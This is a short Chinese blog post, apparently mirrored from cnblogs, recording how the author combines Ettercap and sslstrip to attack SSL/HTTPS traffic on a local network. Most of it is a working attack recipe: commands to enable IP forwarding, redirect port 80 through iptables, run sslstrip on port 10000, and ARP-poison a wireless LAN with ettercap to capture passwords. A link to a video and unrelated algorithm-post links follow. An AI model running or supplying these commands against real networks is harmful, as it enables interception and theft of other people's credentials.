zoukankan      html  css  js  c++  java
  • Ettercap结合sslstrip对ssl/https进行攻击

       

            Ettercap是一个非常强大的嗅探欺骗工具;在以往的ettercap的使用过程中,我们大多用来嗅探http,ftp,和一些加密比较简单的邮箱等的密码,对于新型的ssl/https等的加密协议就显得不是太完美;这里我们使用一款专门针对ssl/https加密协议的工具配合Ettercap进行局域网嗅探欺骗:sslstrip。

           以下方法均来自互联网,这里只是记录一下笔者自己使用过程!

     

    1.开启转发:

    echo "1">/proc/sys/net/ipv4/ip_forward

    2.iptables过滤数据包

    iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000

    还有一种方式:修改/etc/ettercap/etter.conf

    去掉# if you use iptables:

       redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"

       redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"

    的两个注释即可

    3.监听转发端口

    sslstrip -l 10000 

    4.arp嗅探

    ettercap -T -q -i wlan0 -M arp:remote // //

     

       

       

       

    视频:

    清晰版下载地址:http://pan.baidu.com/s/1qWJbFrA

  • 相关阅读:
    HDU 2955(01背包问题)
    POJ 2250(LCS最长公共子序列)
    POJ 3356(最短编辑距离问题)
    HDU 1069 Monkey and Banana(LIS最长上升子序列)
    POJ
    HDU 2955(0-1背包问题)
    HDU2602 (0-1背包问题)
    hdu1003 Max Sum(经典dp )
    C题
    D题(贪心)
  • 原文地址:https://www.cnblogs.com/h4ck0ne/p/5154688.html
Copyright © 2011-2022 走看看